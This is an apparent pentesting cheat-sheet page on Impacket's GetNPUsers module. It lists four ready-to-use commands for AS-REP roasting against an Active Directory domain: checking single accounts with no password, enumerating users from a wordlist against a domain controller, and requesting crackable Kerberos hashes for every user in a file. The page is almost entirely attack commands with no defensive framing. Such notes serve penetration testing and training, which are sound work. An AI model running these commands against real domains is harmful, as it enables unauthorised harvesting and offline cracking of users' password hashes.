search
githubEdit

Impacket-GetNPUsers

hashtag
Use this impacket module to perform an ASREP-Roasting attack

hashtag
1)

Impacket-GetNPUsers DOMAIN.COM/USERNAME -no-pass (ASREPRoastable account)

hashtag
2)

Impacket-GetNPUsers DOMAIN.COM/USERNAME:PASSWORD (Request for ASREPRoastable Users within the domain)

hashtag
3)

GetNPUsers.py DOMAIN.local/ -no-pass -usersfile users.txt -dc-ip DC_IP | grep -v 'KDC_ERR_C_PRINCIPAL_UNKNOWN'

(Check a list of valid users that are ASREPRoastable)

hashtag
4)

impacket-GetNPUsers -dc-ip DC_IP -request -usersfile usernames.txt DOAMIN.COM/

(ASREPRoast the users within the usernames file)

PreviousImpacket-dpapiNextImpacket-GetUserSPNs

Last updated